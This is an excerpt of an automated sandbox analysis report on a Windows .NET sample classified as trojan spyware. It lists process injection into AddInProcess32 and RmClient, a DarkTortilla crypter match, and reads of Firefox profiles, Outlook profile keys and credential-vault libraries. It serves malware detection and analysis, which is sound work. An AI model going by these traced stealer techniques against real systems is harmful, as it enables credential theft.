Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EBA840	7_2_02EBA840
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB2840	7_2_02EB2840
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB29A0	7_2_02EB29A0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F7A9A6	7_2_02F7A9A6
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EC6962	7_2_02EC6962
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6EEDB	7_2_02F6EEDB
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6CE93	7_2_02F6CE93
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EC2E90	7_2_02EC2E90
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB0E59	7_2_02EB0E59
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6EE26	7_2_02F6EE26
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EA2FC8	7_2_02EA2FC8
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F2EFA0	7_2_02F2EFA0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F24F40	7_2_02F24F40
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F52F30	7_2_02F52F30
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EF2F28	7_2_02EF2F28
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02ED0F30	7_2_02ED0F30
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EA0CF2	7_2_02EA0CF2
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F50CB5	7_2_02F50CB5
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB0C00	7_2_02EB0C00
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EAADE0	7_2_02EAADE0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EC8DBF	7_2_02EC8DBF
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EBAD00	7_2_02EBAD00
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F4CD1F	7_2_02F4CD1F
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F512ED	7_2_02F512ED
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02ECD2F0	7_2_02ECD2F0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02ECB2C0	7_2_02ECB2C0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB52A0	7_2_02EB52A0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EF739A	7_2_02EF739A
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02E9D34C	7_2_02E9D34C
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6132D	7_2_02F6132D
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6F0E0	7_2_02F6F0E0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F670E9	7_2_02F670E9
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB70C0	7_2_02EB70C0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F5F0CC	7_2_02F5F0CC
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EBB1B0	7_2_02EBB1B0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE516C	7_2_02EE516C
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02E9F172	7_2_02E9F172
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F7B16B	7_2_02F7B16B
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F616CC	7_2_02F616CC
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EF5630	7_2_02EF5630
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6F7B0	7_2_02F6F7B0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EA1460	7_2_02EA1460
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6F43F	7_2_02F6F43F
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F4D5B0	7_2_02F4D5B0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F67571	7_2_02F67571
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F5DAC6	7_2_02F5DAC6
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EF5AA0	7_2_02EF5AA0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F51AA3	7_2_02F51AA3
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F4DAAC	7_2_02F4DAAC
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F23A6C	7_2_02F23A6C
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F67A46	7_2_02F67A46
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6FA49	7_2_02F6FA49
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F25BF0	7_2_02F25BF0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EEDBF9	7_2_02EEDBF9
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02ECFB80	7_2_02ECFB80
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6FB76	7_2_02F6FB76
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB38E0	7_2_02EB38E0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F1D800	7_2_02F1D800
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB9950	7_2_02EB9950
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02ECB950	7_2_02ECB950
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F45910	7_2_02F45910
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB9EB0	7_2_02EB9EB0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6FFB1	7_2_02F6FFB1
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB1F92	7_2_02EB1F92
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6FF09	7_2_02F6FF09
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F6FCF2	7_2_02F6FCF2
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F29C32	7_2_02F29C32
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02ECFDC0	7_2_02ECFDC0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F67D73	7_2_02F67D73
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EB3D40	7_2_02EB3D40
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02F61D5A	7_2_02F61D5A
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_00501880	7_2_00501880
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_004FC7A0	7_2_004FC7A0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_004FA9C6	7_2_004FA9C6
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_004FC9C0	7_2_004FC9C0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_004FA9D0	7_2_004FA9D0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_004FAB19	7_2_004FAB19
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_004FAB20	7_2_004FAB20
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_004FABEA	7_2_004FABEA
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_00504F10	7_2_00504F10
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_0050311C	7_2_0050311C
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_00503120	7_2_00503120
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_004F11B4	7_2_004F11B4
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_0051B4A0	7_2_0051B4A0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02BD53A1	7_2_02BD53A1
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02BD538D	7_2_02BD538D
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02BCE387	7_2_02BCE387
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02BCD7E8	7_2_02BCD7E8
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02BCE71D	7_2_02BCE71D
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02BCCA88	7_2_02BCCA88

Source: C:\Windows\SysWOW64\RmClient.exe	Code function: String function: 02F1EA12 appears 86 times
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: String function: 02EF7E54 appears 99 times
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: String function: 02E9B970 appears 262 times
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: String function: 02F2F290 appears 103 times
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: String function: 02EE5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 01995130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 0194B970 appears 262 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 019DF290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 019A7E54 appears 107 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 019CEA12 appears 86 times

Source: 0Z2lZiPk5K.exe, 00000000.00000002.2212673188.00000000084E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8SH.dll6 vs 0Z2lZiPk5K.exe
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2192147310.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBamokinepApp.dll< vs 0Z2lZiPk5K.exe
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2174450838.000000000105E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 0Z2lZiPk5K.exe
Source: 0Z2lZiPk5K.exe, 00000000.00000000.1678108286.0000000000670000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePQQ27367.exeT vs 0Z2lZiPk5K.exe
Source: 0Z2lZiPk5K.exe	Binary or memory string: OriginalFilenamePQQ27367.exeT vs 0Z2lZiPk5K.exe

Source: 0Z2lZiPk5K.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0Z2lZiPk5K.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0Z2lZiPk5K.exe, t3XN.cs

Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@4/2

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0Z2lZiPk5K.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\RmClient.exe

File created: C:\Users\user\AppData\Local\Temp\40182GJpK

Jump to behavior

Source: 0Z2lZiPk5K.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0Z2lZiPk5K.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RmClient.exe, 00000007.00000003.2808755583.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000007.00000002.2926246142.00000000008B0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 0Z2lZiPk5K.exe

ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\0Z2lZiPk5K.exe "C:\Users\user\Desktop\0Z2lZiPk5K.exe"
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
Source: C:\Windows\SysWOW64\RmClient.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\RmClient.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 0Z2lZiPk5K.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 0Z2lZiPk5K.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RmClient.pdbGCTL source: AddInProcess32.exe, 00000003.00000002.2461100841.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, ONQMbShhwr.exe, 00000006.00000002.2926089093.0000000001108000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdb source: RmClient.exe, 00000007.00000002.2928343974.000000000349C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000007.00000002.2926246142.000000000082D000.00000004.00000020.00020000.00000000.sdmp, ONQMbShhwr.exe, 00000009.00000002.2927549889.0000000002D8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2922061319.000000002F31C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ONQMbShhwr.exe, 00000006.00000000.2383222692.000000000057E000.00000002.00000001.01000000.0000000B.sdmp, ONQMbShhwr.exe, 00000009.00000002.2925496302.000000000057E000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000007.00000002.2927731493.000000000300E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000007.00000003.2460857404.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000007.00000002.2927731493.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000007.00000003.2463211512.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000007.00000002.2927731493.000000000300E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000007.00000003.2460857404.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000007.00000002.2927731493.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000007.00000003.2463211512.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: RmClient.exe, 00000007.00000002.2928343974.000000000349C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000007.00000002.2926246142.000000000082D000.00000004.00000020.00020000.00000000.sdmp, ONQMbShhwr.exe, 00000009.00000002.2927549889.0000000002D8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2922061319.000000002F31C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: RmClient.pdb source: AddInProcess32.exe, 00000003.00000002.2461100841.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, ONQMbShhwr.exe, 00000006.00000002.2926089093.0000000001108000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 0.2.0Z2lZiPk5K.exe.55b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0Z2lZiPk5K.exe.55b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2192147310.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2175253343.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0Z2lZiPk5K.exe PID: 6496, type: MEMORYSTR

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0Z2lZiPk5K.exe, Xb.cs

.Net Code: NewLateBinding.LateCall(objectValue, (Type)null, "Invoke", obj2, (string[])null, (Type[])null, obj3, true)

.NET source code contains potential unpacker

Source: 0.2.0Z2lZiPk5K.exe.55b0000.6.raw.unpack, Class4_Reader.cs

.Net Code: Method4 contains xor as well as GetObject

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_02BF5C28 push eax; iretd	0_2_02BF6681
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_064E54D1 push es; ret	0_2_064E54E0
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_064E0006 push es; retf	0_2_064E001C
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_064ED19D push esi; ret	0_2_064ED1A3
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EE2710 pushad ; ret	0_2_07EE2711
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EE32FB push ecx; iretd	0_2_07EE32FC
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EE3A88 push esp; iretd	0_2_07EE3A89
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07EEEA85 push esi; ret	0_2_07EEEA86
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5A731 push es; ret	0_2_07F5A740
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F5DEA1 push ebx; ret	0_2_07F5DEA5
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F59E8B push cs; ret	0_2_07F59E8C
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_07F55232 push cs; retf	0_2_07F55234
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Code function: 0_2_08538F00 push esp; retf	0_2_08538F05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004020A2 push esp; iretd	3_2_004020A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040A9ED push esi; iretd	3_2_0040A9EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004031B0 push eax; ret	3_2_004031B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_00416BEE push ebp; ret	3_2_00416BF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_00417D70 push esi; ret	3_2_00417D71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004135D8 pushad ; retf	3_2_00413646
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_00413697 pushad ; retf	3_2_00413646
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_004136A8 pushad ; retf	3_2_00413646
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0192225F pushad ; ret	3_2_019227F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019227FA pushad ; ret	3_2_019227F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019509AD push ecx; mov dword ptr [esp], ecx	3_2_019509B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0192283D push eax; iretd	3_2_01922858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01921368 push eax; iretd	3_2_01921369
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_04620C61 pushad ; retf	6_2_04620C10
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_04620C72 pushad ; retf	6_2_04620C10
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_04622D31 push 215F528Eh; iretd	6_2_04622D57
